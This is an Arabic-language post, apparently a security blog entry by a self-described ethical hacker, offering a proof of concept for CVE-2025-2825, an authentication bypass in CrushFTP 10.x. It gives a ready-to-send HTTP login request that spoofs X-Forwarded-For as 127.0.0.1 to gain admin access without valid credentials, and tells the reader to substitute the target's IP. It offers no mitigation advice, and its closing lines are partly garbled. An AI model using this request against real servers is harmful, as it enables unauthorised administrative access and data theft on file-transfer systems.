تجاوز المصادقة PoC لثغرة CVE-2025-2825 – استغلال CrushFTP 10.x
CVE-2025-2825 هي ثغرة حرجة في تجاوز المصادقة تؤثر على CrushFTP، وهو خادم آمن لنقل الملفات يُستخدم على نطاق واسع. تسمح هذه الثغرة للمهاجمين عن بُعد بتجاوز مصادقة تسجيل الدخول والحصول على وصول إداري عبر تزوير الترويسات — مما يخدع الخادم ليظن أن الطلب جاء من localhost.
تنشأ الثغرة بسبب التحقق غير السليم من ترويسة X-Forwarded-For. عندما يتم تعيين هذه الترويسة إلى 127.0.0.1، يعامل الخادم الطلب على أنه محلي — متجاوزًا المصادقة.
GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1
Host: target-ip
X-Forwarded-For: 127.0.0.1
📝 استبدل
target-ipبعنوان IP الفعلي لخادم CrushFTP المستهدف.
في حال نجاح الاستغلال، يتجاوز الخادم المصادقة ويمنح الوصول — حتى مع بيانات اعتماد غير صحيحة.
X-Forwarded-For: 127.0.0.1
X-Forwarded-For.Shivshant Patil
مختص اختراق أخلاقي معتمد (CEH v13)
خريج بكالوريوس هندسة الحاسوب
🔗 ملف LinkedIn
🔗 ملف GitHub